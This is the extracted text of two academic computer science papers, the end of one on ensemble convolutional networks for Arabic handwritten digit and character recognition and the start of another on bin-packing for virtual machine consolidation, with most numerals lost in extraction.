are divided into a training set of , images and a test set of , . this seems to be the largest dataset for this task available in literature. this makes it an ideal choice for training the network and fine-tuning parameters. furthermore, as discussed in detail on the next section, previous results obtained from this dataset allow for comparison with the results presented in this manuscript. it is worth noting that this dataset is a modified version of an equivalent dataset called adbase, which contains the same images with a different image size. to create madbase, adbase images were resized and transformed from binary to grayscale to be equivalent to mnist. while the madbase dataset deals with digits, the arabic handwritten character dataset (ahcd) (el-sawy, loey & hazem, ) includes , images of isolated characters divided in training set of , and a test set of , images. this seems to be the largest dataset available for this classification task. regarding previous results, mahmoud ( ) presented a method for recognition of handwritten arabic digits based on extraction of gabor-based features and support vector machines (svms). the dataset used in this case contained , samples provided by writers. the average classification accuracy rates obtained were of . % and . % using three scales & five orientations and four scales & six orientations respectively. abdleazeem & el-sherif ( ) applied several classification methods to the madbase dataset. their best result was obtained with a radial basis function support vector machine (rbf svm), with which a two stage classification was performed. in the first stage several customized features were extracted from a similar dataset by the researchers, and then used as input for the rbf svm. the classifier was tuned to maximize the classification accuracy, which had a final value of . %. this value corresponds to the best parameter combination. el melhaoui et al. ( ) used a small dataset of digit images to obtain a % recognition rate using a technique based loci characteristics. pandi selvi & meyyappan ( ) proposed an approach for arabic digit recognition using neural networks and training through backpropagation. the dataset used in this case was also small, and the classification accuracy obtained was %. takruri, al-hmouz & al-hmouz ( ) obtained a test classification accuracy of % using a dataset of , digit images, by using a three level classifier consisting on svm, fuzzy c means and unique pixels. salameh ( ) presented two methods for enhancing recognition of arabic handwritten digits. the methods combine fuzzy logic pattern classification to counting the number of ends of the digit shapes to obtain a classification test accuracy of % for some fonts. alkhateeb & alseid ( ), using the adbase dataset, obtained an . % classification accuracy by using dynamic bayesian networks (dbn). palatnik de sousa ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. although it is hard to compare results provided by training with different datasets, the larger datasets seem to result in worse classification accuracies, most likely since they cover a larger sample of the variability of styles in handwriting. this further indicates that using the largest, more challenging datasets available, with the largest number of writing participants, is an ideal choice, as was done for this manuscript. loey, el-sawy & el-bakry ( ) used stacked autoencoders on the madbase dataset to obtain a classification accuracy of . %. mudhsh & almodfer ( ) obtained a validation accuracy of up to . % on the madbase dataset by usage of dropout regularization and data augmentation, and an architecture inspired by the vggnet convolutional neural network (cnn) (simonyan & zisserman, ). importantly, they mention in the text that this validation accuracy does not hold for the test set, without mentioning explicitly the test accuracy. the validation method was a -fold cross-validation. they also tested the performance of the algorithm on a dataset of , images of characters, obtaining a validation accuracy of . %. again they mention that this validation accuracy does not hold for the test set, without clearly stating the test accuracy. younis ( ) obtained an accuracy of . % on the previously mentioned ahcd dataset, by use of a deep cnn with batch normalization and learning rate scheduling. the general trend observed in these works is that feature extraction aids in the classification task. this makes the choice of convolution based networks straightforward, as these architectures are precisely constructed to be specialized feature extractors. it seems to make sense that cnns have the best results so far for this task, in these previously reported results. in this work, the best previous ideas and results are incremented further by usage of some changes in architecture and in the training procedure. namely both the vggnet inspiration and a batch normalized cnn are employed, combining their classifications through ensemble averaging. the details of this method are described in the next section. materials and methods the code for defining and training the networks was implemented in python, using the keras framework with tensorflow backend. the key aspects of the classification system are, namely, the selection and preparation of the datasets, the network architecture, the training schedule, the validation strategy, the data augmentation, and the ensemble selection. each of these is explained more in detail below. selection and preparation of datasets the datasets chosen for training and parameter tuning were the madbase and ahcd datasets described in the previous section. for both datasets, the networks were trained from scratch, although most of the parameter tuning was done with madbase, since it is a much larger dataset. since the images in both datasets are already prepared for training, the only pre- processing done was converting the value of each pixel to float format and dividing by for normalization purposes. figure shows some examples from each dataset. palatnik de sousa ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure example images from the madbase and ahcd datasets. full-size doi: . /peerjcs. /fig- network architecture the classification method consists on an ensemble of four networks. these are actually two networks, each trained with two different strategies (with data augmentation and without). rather than choosing whether to apply augmentation or not, both options are used and the results are gathered in an ensemble classifier. this also allows for a direct comparison of the predictive power of each individual network against the results of the ensemble. for brevity, the ensemble of four networks will be called ens throughout the manuscript. the first type of cnn used in the ensemble was inspired by the vgg network, readily implemented for keras. this architecture couldn’t be used directly, however, because it assumes the inputs are images of three channels (rgb) of default size by pixels, and minimum size by pixels. images below this size are too small to pass through the five convolution blocks of the network. the images of madbase and ahcd have dimensions of by pixels and by pixels, respectively. furthermore they are grayscale images with only channel. the solution to this was adapting the vgg architecture by removing the fifth convolution block, and creating three channel images from the one channel images by simply stacking the same single channel three times. another adaptation added was a dropout layer before the final dense softmax layer, and only using two dense layers instead of three. the resulting layer architecture, intended for these grayscale images, will be called vgg on this manuscript, for brevity. the second type of cnn used was designed from scratch in this work to include the dropout and batch normalization regularizations within both the feature extraction convolution blocks as well as the dense fully connected classification block. the architecture was adapted after several experiments to be as simple as possible, allowing for fast training, while still providing robust classifications. for brevity this architecture that includes palatnik de sousa ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure diagrams of vgg and regu. conv refers to convolutional layers, pool to max-pooling layers, full to dense fully connected layers and norm to batch normalization layers. purple round rect- angles correspond to convolutional feature extraction blocks, and orange round rectangles correspond to fully connected classification blocks. more details about the architectures can be found on a suplemental file along the manuscript. full-size doi: . /peerjcs. /fig- both types of regularizations (dropout and batch normalization) will be termed regu throughout the rest of the manuscript. figure contains illustrative schemes of vgg and regu. namely, vgg contains four convolution blocks and one fully connected block. the convolution filters used in all convolution layers have size × . the number of filters used in the first block is , and doubles on every further block up to on block . relu activation was used for the convolution layers, as well as same padding. the max pooling elements had a size of × . the fully connected block has two dense layers. the first, with relu activation, has neurons. the second, with softmax activation, has neurons for the case of madbase and for the case of ahcd. a . dropout rate was used. regarding regu, there are two convolution blocks and one fully connected block. the first convolution block has two convolution layers with filters of size × and relu activation. a . dropout rate was used, followed by batch normalization. the max pooling elements had a size of × . the second convolution block is identical, except for the number of convolution filters, which is and for a batch normalization applied at the start of the block. the fully connected block in this case has batch normalizations before each dense layer. the dense layers are identical to the case of vgg . the first has neurons and relu activation, and the second has softmax activation and neurons for madbase and palatnik de sousa ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. neurons for ahcd. a . dropout rate was used. these descriptions are summarized in a supplemental file that can be used for building this architecture on keras. training schedule the literature review and previous works cited show that, in general, the training for ahr tasks is done with optimizers such as stochastic gradient descent (sgd) or with an adaptive method such as adam (kingma & ba, ), often paired with learning rate schedules. however, a generalization gap between adam and sgd has been observed recently for many tasks involving image classification and language modelling (keskar & socher, ). it has been indicated that that sgd finds more optimal lower minimums for the loss function, despite converging at a much lower rate than adam. according to keskar and socher, this favors the usage of adam for the first epochs of training, providing a fast convergence to lower losses, with a swap to sgd for a more fine convergence at the end of the training. this swapping strategy closed the generalization gap on the tests performed by keskar and socher. a few experiments were performed with vgg and regu using adam, sgd and this adam and sgd swapping strategy. the initial results confirmed the observations of keskar and socher, and as such the swapping strategy was adopted for the rest of the experiments. namely, the number of epochs before and after the swap was treated as a parameter to be tuned, and eventually values of epochs of adam training followed by epochs of sgd training seemed to provide the best results. for the epochs of sgd training, inspired by previous works that used learning rate scheduling, a strategy of reducing the learning rate periodically was adopted. specifically, this only happened if and when the test loss reached a plateau. there is an already implemented function in keras, reduceonlrpplateau, for this purpose. whenever a plateau was reached, the learning rate was multiplied by a factor of . . for this task in particular, the choice of this training strategy produced better results when compared to use of sgd or adam individually for epochs. it is the first time such a strategy has been employed for the task of arabic handwritten character and digit recognition. it is also worth noting that using sgd individually didn’t reliably give similar results to the swapping strategy, even when more training epochs were allowed, as sgd seemed to have trouble converging on the first few epochs of training, remaining at high training and validation and loss values. the loss function used was categorical cross-entropy, which is adequate given the softmax activation of the last dense layer of both vgg and regu. mean square error was also tried in initial experiments, but it consistently resulted in worse performance. validation strategy both datasets used (madbase and ahcd) provide separate test sets, but not separate validation sets. if the test sets were to be used for validation purposes, this would make the classifier heavily biased towards that specific test set. it would then be difficult to verify how good the classifier is at generalizing. palatnik de sousa ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. as such, using part of the training set for validation is the ideal approach. with the validation set all the parameters were tuned to find the highest values of validation accuracy, and only after this training was done, and no other changes were to be effected to ens , the testing set was used for evaluation. however this means that the validation strategy chosen for parameter tuning could affect the generalization capabilities of the network. furthermore, there is randomness present in the training procedure, whether in weight initialization, in the data augmentation method, the dropout regularization or other aspects. this suggests that multiple runs are necessary to obtain an average behavior and performance of the classifier. the most commonly applied validation methodologies that use multiple runs are monte carlo cross-validation (mccv) (xu & liang, ) and k-fold cross-validation (kcv) (refaeilzadeh, tang & liu, ). in mccv, a subset of the training set is chosen at random and used as a validation set. this is repeated as many times as necessary, in general ensuring that the validation set always has the same size. in kcv the training set is divided into k subsets (named folds) of the same size, and each fold is used as a validation set, while all of the other folds are gathered as a training set. a very commonly used value for k is . generally speaking there isn’t a definitive answer as to which of these two methodologies is best for a given task, as this is highly dependent on the particularities of each dataset. mudhsh & almodfer ( ), for instance, have used -fold cross validation in their study of madbase. for this present manuscript, both mccv and kcv were employed for the madbase dataset to give as much information as possible for fine-tuning the parameters, before the test set was used for evaluation. since the test set has , images for madbase, the mccv was implemented so that the validation sets also had , images. this means the training sets effectively had , images during training. a total of runs were performed in this manner, and the average performances were computed. for the kcv, a -fold cross-validation was used to allow for direct comparison with the results of mudhsh & almodfer ( ), but it must be noted that dividing the original training set of , into folds means each validation set has a size of , . since the size of the validation set can be adjusted by changing the value of k, and the test set size is fixed, a -fold validation was also performed (since this implies validation sets of size , , the same as the provided test sets). given the smaller size of ahcd, using -fold cross validation makes the validation sets too small compared to the test set, and as such only mccv was employed in that case, ensuring the validation and test sets had the same size. as with madbase, this cross-validation was repeated times. the results of the several runs with each method were averaged to allow for decision making regarding parameter tuning. once the best validation results were reached with ens , the test set was used for evaluation. palatnik de sousa ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. data augmentation the method of data augmentation has been used previously in ahr (mudhsh & almodfer, ). in the present study, data augmentation was applied to the training sets of both madbase and ahcd in some of the experiments. the purpose is to create a more varied dataset that could make the classifier more robust. since ens includes both the networks trained without and with data augmentation, the networks corresponding to the latter case will be named vgg _aug and regu_aug for disambiguation. the augmentation method used was the already implemented imagedatagenerator on keras, with zoom_range, height_shift_range and width shift range parameters equal to . . other parameters were also tested, but invariably led to a worse performance of the augmented classifiers. it is known that not all forms of augmentation are necessarily helpful for all tasks (mudhsh & almodfer, ), and the tree chosen yield the best results for these ahr architectures. the batch size of augmented images had a size of . ensemble selection once vgg , vgg _aug, regu and regu_aug were trained, the idea was to combine their predictions into an averaged ensemble classifier (simonyan & zisserman, ). the two main approaches that could be used for this include averaging the predictions of each of the networks that form ens , or using a maximum voting approach, where the biggest softmax probability between the four networks is taken as the answer. both methods were initially used, with averaging eventually showing a better performance overall. as such, the output softmax probabilities of ens are the average calculated from the outputs of vgg , vgg _aug, regu and regu_aug. roughly, the process of training the entire ensemble, took about h per run on the available hardware. gpu acceleration was used. weight initialization previous works in literature regarding ahr often don’t describe weight initialization strategies. for this study we have used glorot-normal initialization (glorot & bengio, ). on their work, glorot and bengio mention how this initialization often outperforms other normalized initializations. indeed, this came to be the standard initialization for the keras framework. for comparison, runs with he-normal, random normalized and all-zeroes initializations were performed. preliminary tests showed that the standard glorot-normal initialization yielded better results, and so this was kept throughout the rest of the runs. results the optimizer swapping strategy described in the previous section, combined with the learning rate scheduling, produces a consistent behavior of convergence of the loss function with the training epochs. in the first twenty epochs, the adam optimizer causes loss values to drop towards lower and more stable values, and on the next epochs sgd brings these values to a lower, nearly constant minimum. an example of this behavior can be seen in fig. , showing the plots for loss and accuracy over the training epochs. palatnik de sousa ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure example of training and validation acurracy and loss as a function of training epochs. each of the four individual networks that compose ens are portrayed. up to the th epoch, under adam op- timization, the values gradually oscilate less. notably when swapping to sgd at epoch there is a slight improvement of performance (higher acurracy, lower loss), followed by a narrower convergence of the values. this behavior was consistent throughout all runs. full-size doi: . /peerjcs. /fig- table summary of results. averaged test and validation accuracies with different cross- validation strategies. entries in the table correspond to the individual networks (vgg , regu, vgg _aug and regu_aug) and ens . mccv kcv fold kcv fold accuracy (%) standard deviation (n%) accuracy (%) standard deviation (n%) accuracy (%) standard deviation (n%) validation (madbase) vgg , , , , , , regu , , , , , , vgg _aug , , , , , , regu_aug , , , , , , ens , , , , , , test (madbase) vgg , , , , , , regu , , , , , , vgg _aug , , , , , , regu_aug , , , , , , ens , , , , , , after the initial parameter tuning was performed with madbase, the experiments corresponding to mccv runs, fold runs and six fold runs were performed. the averaged results are summarized in table . the full raw results of the runs, used to calculate these averages, are presented as a supplemental file along the manuscript. interestingly, the only case where one of the individual networks outperformed the full ensemble was for one of the regu_aug results. furthermore, regu_aug consistently palatnik de sousa ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. outperformed vgg _aug in all experiments with this dataset, even though the architecture is arguably much simpler (having effectively six layers compared to the of vgg ). for madbase, the maximum value of test accuracy was observed during one of the -fold tests: . %. this result outperforms the . % rbf svm result reported abdleazeem & el-sherif ( ). the maximum validation accuracy was observed during one the mccv runs: . %, which outperforms the . % validation accuracy reported by mudhsh & almodfer ( ). it was also observed that the final averaged test accuracy of -fold validation for madbase was the best result among the three validation strategies. however it surpasses the other two by only . %. in the madbase test dataset of , images this corresponds to a difference of just two images. the difference in stdev is also small, of . %. overall this does not seem to show a clear best choice between mccv and kcv validation strategies. as such, the ahcd dataset was studied using mccv for parameter tuning. the validation and test accuracies were, respectively, . % and . %. these also meet and improve upon the state of the art values mentioned in ‘introduction’. discussion notably, standard deviation (stdev) of the results of mccv runs were lower than the standard deviation of either kcv. the only exceptions are for the ens validation stdev, and the vgg _aug test stdev. this seems to indicate that the mccv yields less disperse validation and test accuracies for madbase. the fact that regu was observed to outperform vgg suggests the importance of batch normalization for this task. it was also observed that data augmentation resulted consistently in improvements for both validation and test accuracies. furthermore, ensemble averaging resulted in higher validation and test accuracies while at the same time reducing the standard deviation over the number of the experiments performed. in terms of the validation and test accuracies, -fold cross-validation was consistently a worse performing metric compared to sixfold cross-validation and mccv. generally speaking whenever tenfold cross-validation was used for parameter tuning, the observed accuracies were in general worse. this is true for both validation and test accuracies. however for the most part, the observed differences were on the order of less than misclassifications, which doesn’t justify preference for a particular validation strategy if it would be much more computationally costly than the alternative. the average test and validation accuracy values of ens are very promising and improve upon the presently available state of the art listed in ‘introduction’, for madbase. the best test accuracy result of . % indicates that ens is the first classifier to outperform the accuracy value of . % of the two stage rbf svm classifier by abdleazeem & el-sherif ( ) for this dataset. importantly, ens achieves this in a single stage classification, with no previous feature extraction. palatnik de sousa ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. conclusion a method for offline arabic handwritten recognition was described in this manuscript. the system was trained and tested on the two largest available datasets of arabic digits and characters. the architecture used consisted of an ensemble averaging of four convolutional neural networks. of these four, two were inspired by vggnet and two were written from scratch using batch normalization and dropout regularization. each of these was trained twice: once with data augmentation, once without. the training used a swapping method where the first epochs use an adaptive optimizer (adam) and the last epochs use regular stochastic gradient descent. it further used learning rate scheduling if the loss decrease reached a plateau during the sgd training epochs. two validation strategies were considered: monte carlo cross-validation and k-fold cross-validation. for the latter, two values of k were used, one commonly used in literature, and one that ensures the test and validation sets have the same size for the madbase dataset. the results didn’t show a clear advantage of choosing either method for this dataset in particular. the use of a categorical cross-entropy loss function outperformed the use of a mean squared error function for the same purpose, possibly because of the choice of softmax activations for the final dense layer of the individual networks. glorot-normal weight initialization outperformed the other alternatives tested (he- normal, all-zero, random normalized). future works could test initializations more exhaustively, to see if there is a particular combination of initializations that yield better results for ahr, although the results so far seem to indicate that other aspects of the architecture and training are more relevant to the end result. the results obtained improve upon the state of the art both the madbase and ahcd datasets. the fact the ensemble averaging gives promising results suggests future projects could adapt other types of larger convolution based networks, or try different training strategies, while also adding them to ensemble averaging classifiers. other types of ensemble averaging, such as weighted averages, could be explored more in depth for this purpose as well. additional information and declarations funding this work was supported by the national council for scientific and technological development of brazil, through a phd scholarship. there was no additional external funding received for this study. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the author: national council for scientific and technological development of brazil. palatnik de sousa ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. competing interests the authors declare there are no competing interests. author contributions • iam palatnik de sousa conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. data availability the following information was supplied regarding data availability: there are three supplemental files. the text file includes relevant specific details about the network architectures used in the manuscript. the excel file includes the raw results from the experiments run in the manuscript. the ipynb file is the pthon code notebook. the raw data (specific details about the network architectures used, raw results from the experiments run and the python code notebook) is available as supplemental files. ahcd: https://www.kaggle.com/mloey /ahcd . madbase: https://www.kaggle.com/mloey /ahdd /. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references abdelazeem s. . comparing arabic and latin handwritten digits recognition problems. world academy of science, engineering and technology : – . abdleazeem s, el-sherif e. . arabic handwritten digit recognition. international journal of document analysis and recognition ( ): – doi . /s - - - . alkhateeb jh, alseid m. . dbn—based learning for arabic handwritten digit recognition using dct features. in: th international conference on computer science and information technology (csit). – . el melhaoui o, maroc m, el hitmy m, lekhal f. . arabic numerals recognition based on an improved version of the loci characteristic. international journal of computer applications ( ): – doi . / - . el-sawy a, loey m, hazem eb. . arabic handwritten characters recognition using convolutional neural network. wseas transactions on computer research : – . keskar ns, socher r. . improving generalization performance by switching from adam to sgd. arxiv preprint. arxiv: . . kingma dp, ba j. . adam: a method for stochastic optimization. arxiv preprint. arxiv: . . lecun y, bottou l, bengio y, haffner p. . gradient-based learning applied to docu- ment recognition. proceedings of the ieee ( ): – doi . / . . palatnik de sousa ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information https://www.kaggle.com/mloey /ahcd https://www.kaggle.com/mloey /ahdd / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / - http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. loey m, el-sawy a, el-bakry h. . deep learning autoencoder approach for handwritten arabic digits recognition. arxiv preprint. arxiv: . . mahmoud sa. . arabic (indian) handwritten digits recognition using gabor-based features. in: innovations in information technology, . iit . international conference. piscataway: ieee, – . mudhsh m, almodfer r. . arabic handwritten alphanumeric character recognition using very deep neural network. information ( ): doi . /info . refaeilzadeh p, tang l, liu h. . cross-validation. encyclopedia of database systems doi . / - - - - _ . salameh m. . arabic digits recognition using statistical analysis for end/conjunction points and fuzzy logic for pattern recognition techniques. world of computer science & information technology journal ( ). selvi pp, meyyappan t. . recognition of arabic numerals with grouping and ungrouping using back propagation neural network. in: international conference on pattern recognition, informatics and mobile engineering (prime). piscataway: ieee, – . simonyan k, zisserman a. . very deep convolutional networks for large-scale image recognition. arxiv preprint. arxiv: . . takruri m, al-hmouz r, al-hmouz a. . a three-level classifier: fuzzy c means, support vector machine and unique pixels for arabic handwritten digits. in: computer applications & research (wscar), world symposium. piscataway: ieee, – . xu qs, liang yz. . monte carlo cross validation. chemometrics and intelligent laboratory systems ( ): – doi . /s - ( ) - . younis ks. . arabic handwritten character recognition based on deep convolutional neural networks. jordanian journal of computers and information technology ( ). palatnik de sousa ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://arxiv.org/abs/ . http://dx.doi.org/ . /info http://dx.doi.org/ . / - - - - _ http://arxiv.org/abs/ . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /peerj-cs. submitted july accepted february published february corresponding author eli m. dow, emdow@us.ibm.com academic editor wolfgang banzhaf additional information and declarations can be found on page doi . /peerj-cs. copyright dow distributed under creative commons cc-by . open access decomposed multi-objective bin-packing for virtual machine consolidation eli m. dow industries and solutions, ibm research, yorktown heights, ny, united states department of interdisciplinary engineering science, clarkson university, potsdam, ny, united states abstract in this paper, we describe a novel solution to the problem of virtual machine (vm) consolidation, otherwise known as vm-packing, as applicable to infrastructure-as- a-service cloud data centers. our solution relies on the observation that virtual ma- chines are not infinitely variable in resource consumption. generally, cloud compute providers offer them in fixed resource allocations. effectively this makes all vms of that allocation type (or instance type) generally interchangeable for the purposes of consolidation from a cloud compute provider viewpoint. the main contribution of this work is to demonstrate the advantages to our approach of deconstructing the vm consolidation problem into a two-step process of multidimensional bin packing. the first step is to determine the optimal, but abstract, solution composed of finite groups of equivalent vms that should reside on each host. the second step selects concrete vms from the managed compute pool to satisfy the optimal abstract solution while enforcing anti-colocation and preferential colocation of the virtual machines through vm contracts. we demonstrate our high-performance, deterministic packing solution generation, with over , vms packed in under min. we demonstrating compara- ble runtimes to other vm management solutions published in the literature allowing for favorable extrapolations of the prior work in the field in order to deal with larger vm management problem sizes our solution scales to. subjects autonomous systems, operating systems keywords virtual machine management, consolidation, iaas introduction and motivation the primary contributions of this work are the construction of an efficient algorithm for packing virtual machines densely in an infrastructure-as-a-service (iaas) data center. reducing the number of physical hosts is one way to reduce costs of cloud computing data centers by limiting the power and cooling needs of servers that need not run at full capacity when workloads can be run on a subset of the total available hardware. as has been demonstrated in the literature, powering down hosts completely is generally not ideal given the dynamic nature of cloud computing workloads. consider that some number of individual cloud servers may participate in distributed services that necessarily preclude turning the machines off entirely due to response requirements when serving file contents. though shutting hosts off completely is not an option in all cases, idle machines can be placed into a low power state to achieve much of the benefits described earlier (isci et al., ; zhang et al., ). similar concepts have been applied to the persistent how to cite this article dow ( ), decomposed multi-objective bin-packing for virtual machine consolidation. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:emdow@us.ibm.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. disk volumes supporting storage networks for clouds (narayanan, donnelly & rowstron, ). this effort is also supplementary to an ongoing cloud management framework being developed by our research group specifically to suit small-to-medium business- sized iaas compute clouds. average data center server utilization is reportedly estimated to be around % (± %) (united states environmental protection agency, ). research shows that such low utilization is inefficient because even idle servers may consume more than % of their peak power requirements (gandhi et al., ). the result of these findings is the implication that data centers should strive to have fewer servers running at close to peak utilization if they want to be efficient and more competitive on cost pricing. an obvious solution to drive down cloud compute cost is therefore to consolidate cloud compute resources (virtual machines) onto the minimum number of host servers. many of the previous efforts to describe solutions to infrastructure-as-a-service (iaas) virtual machine packing stem from previous analyses and solutions to general purpose bin-packing type problems. conceptually it works by assuming each vm is allocated some fixed share of the physical host’s compute resources. examples of those fixed resources include the number of logical cores on a multi-core host, or the fractional allocation of the host’s total available memory and persistent storage. many of these approaches are variations on the theme of multi-dimensional bin-packing approach (campegiani & lo presti, ; panigrahy et al., ). others are based on genetic algorithms such as gu et al. ( ), campegiani ( ), and still others on market based systems (lynar, herbert & simon, ). our goal is to design a consolidation placement algorithm that is high performance and suitable for small-to-medium business-sized virtual machine data centers on the order of a few hundred virtual machines spanning fewer than hosts. we focus on this demographic for two reasons. the first is because of the tractability of the problem. the second is because the medium sized business users are less likely to opt for exorbitant hardware capital expense to maintain performance while attempting some level of consolidation. measurements on google, amazon, and microsoft cloud service platforms demonstrate revenue losses ranging from to % (greenberg et al., ; kohavi, henne & sommerfield, ; schurman & brutlag, ) due to consolidation induced latency. as such, the super large data centers often under consolidate intentionally to maintain response times. in google data centers, for instance, it has been reported that consolidated workloads make use of only half of the available compute cores on the hardware (mars et al., ). every other processor core is left unused simply to ensure that performance does not degrade. small-to-medium business (smb) operations on the other hand, may be less cost sensitive to minute latency introductions, especially if they are supporting internal private cloud data centers on premises. prior solutions for general bin packing when considering the existing solutions to virtual machine consolidation placement, it is reasonable to conclude that the problem is most similar to bin-packing solutions. dow ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. stated in terms of the classical bin packing problem, virtual machine consolidation is stated as such: given a set i ={ ,...,n}of items, where item i∈ i has size si ∈ ( , ] and a set b={ ,...,n}of bins with capacity one. find an assignment a: i →b such that the number of empty bins is maximized. the problem is known to be np-complete. further it has been shown that there is no ρ-approximation algorithm with ρ < / for bin packing unless p =np. in other words, consider a finite collection of n weights called w(w ,w ,w ,...,wn), and a collection of identical bins with capacity c (that necessarily must be larger than the maximum individual weight from the set w), what is the minimum number (k) of bins required to contain all the weights without exceeding the bin capacity c? setting aside the mathematical formulation, we are interested in the fewest bins required to store a collection of items. this variant of the bin-packing problem is known as the - dimensional ( -d) bin packing problem. note that it is important to keep in mind that ‘‘weights’’ here are necessarily formulated as indivisible atomic values. the weight of an object being placed must fit entirely within the remaining capacity of a container and may not be subdivided. approximation solutions to the bin packing problem usually make use of heuristic approaches, with the two most relevant solutions being next-fit, and first-fit decreasing. next-fit in the next-fit algorithm, all bins are initially considered to be empty. beginning with bin j = and item i= , if bin j has residual capacity for item i, assign item i to bin j via an assignment function a, i.e., a(i)= j. after an assignment is made, simply consider the next item (i+ ) until exhausting all items. if there are items that still require packing, consider bin j+ and item i. this process continues until the last item is assigned (packed). the major drawback of the next-fit algorithm is that the approach does not consider a bin after it has been processed once and left behind. this can lead to wasted capacity in those bins that are not revisited, and thus there is room for finding a better approximation solution. first-fit decreasing one solution to the drawbacks inherent in next-fit, is to employ the following algorithm. at the start, consider each of k bins as empty. beginning with bins k = and item i= , consider all bins j = ,...,k and place item i in the first bin that has sufficient residual capacity (i.e., a(i)= j). if there is no such bin available, increment k and repeat until the last item n is assigned. this form of first-fit provably uses at most / ∗k bins, where k is the optimal number of required bins for a perfect solution (johnson et al., ). however there are further refinements to the algorithm that should be considered. the simple intuition behind first-fit decreasing is that if you first reorder the items such that s ≥···≥ sn before applying the general first-fit algorithm, you can obtain a superior result. intuitively this is because the conceptually ‘‘larger’’ items, in our case multiple large resource consumption vms are less likely to fit onto a single bin (host), dow ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. so we place each of the large resource consumers first, using the residual space to pack in smaller virtual machines. first fit decreasing runs in o(n ) time. multi-dimensional bin-packing a key concept in -d bin-packing is that there is a single unified weight to be used as the driving input to packing constraints. but in the real world, bin packing is often subject to multivariate constraints. consider trucks being packed with boxes for shipment. we could use a d bin-packing approach based on box weight and the shipping weight of a fleet of trucks, but this doesn’t work out well in the real world because boxes have a -dimensional volume to consider in addition to a weight. simply consider many small but very heavy boxes, or a few light boxes that are voluminous and things become more complicated. hierarchical multi-objective bin packing for virtual machines our solution to packing virtual machines is predicated on two major observations. the first is that most virtual machine cloud providers offer fixed size virtual machines at varying cost structures. at the time of this writing amazon, one of the largest cloud computing hosts for iaas virtual machines, offers vm sizes in small, medium, large, extra-large, double-extra-large, and quadruple-extra-large capacities, each with their own pricing according to a tiered cost structure. this means that in some sense virtual machines belonging to the same capacity and cost structure tier can be considered equivalent for the purposes of packing assignment. the intuition here is that virtual machine packing in a cloud data center is definitely a multi-dimensional bin-packing type of problem where the constraints are related to the host capacities and virtual machine consumption requirements of memory, cpu, disk i/o, and networking. our formulation of the bin packing problem, as it applies to virtual machines, is as follows. given a host with overall hardware capacity c, we can represent that capacity as a tuple of the individual resources that comprise c, for instance cpu, ram, and io as constituent individual capacities, ci we can say formalize the capacity of a host as: c ={c ,c ,c ,...,cn} s.t.∀ci∈c,ci≥ where the physical capacities of a limited resource, i.e., c , might representing the physical cpu capacity of the host, c representing ram capacity of the host, and c representing i/o capacity of host with capacity tuple c. a virtual machine, v can similarly be defined as a tuple of resources required for the operation of that vm according to the same resource cardinality used to describe resource capacities of a host. as an example here: v ={v ,v ,v ,...,vn}. dow ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the value v represents the cpu requirement of virtual machine v , while v similarly means the ram requirements of the vm, and v means the i/o requirements of the virtual machine v . with this formalism we can further consider that a given host is considered over- constrained if any per-resource cumulative vm utilization exceeds a maximum percent- age τ of the physical resource a given threshold. if no oversubscription of resources is allowed with the virtualization platform, ( <τ ≤ ), if oversubscription of resources is permissible, ( <τ ≤τmax) where τmax is the maximum oversubscription threshold allowed. there is thus a tuple for defining the per-host (c), per-measured resource utilization/ over-constraint percentage (τi) of the form: τc ={τ ,τ ,τ ,...,τn}. accordingly, each measured resource may have a τmax defined according to the same cardinality as c and v that denotes the maximum per-resource utilization/over- constraint percentage for a given measured resource. we thusly define functions to retrieve the over-constraint factor as follows: τ(c,i) which is alternatively written as τc[i] using array indexing notation, along with and τmax(c,i) which is alternatively written as τmaxc[i], where c remains a specific host instance, and i remains the cardinality of some measured resource. if there are k virtual machines assigned or allocated to a given host c, the boolean packing allocation p(c) is defined as follows: p(c)=   , iff k∑ i= vi≤ci∗τ(c,i)≤ci∗τmax(c,i) , iff k∑ i= vi >ci∗τ(c,i). the general bin packing problem attempts to solve for the minimum number of hosts n, s.t.∀vi ∈v , vi is placed on some host cj ∈c. hosts which contain some number of packed vms form the set c′ with c′⊆c. any elements in c ∈c′ are unassigned or unused and may be powered down or put into low power standby. thus, the goal of bin packing is to determine the 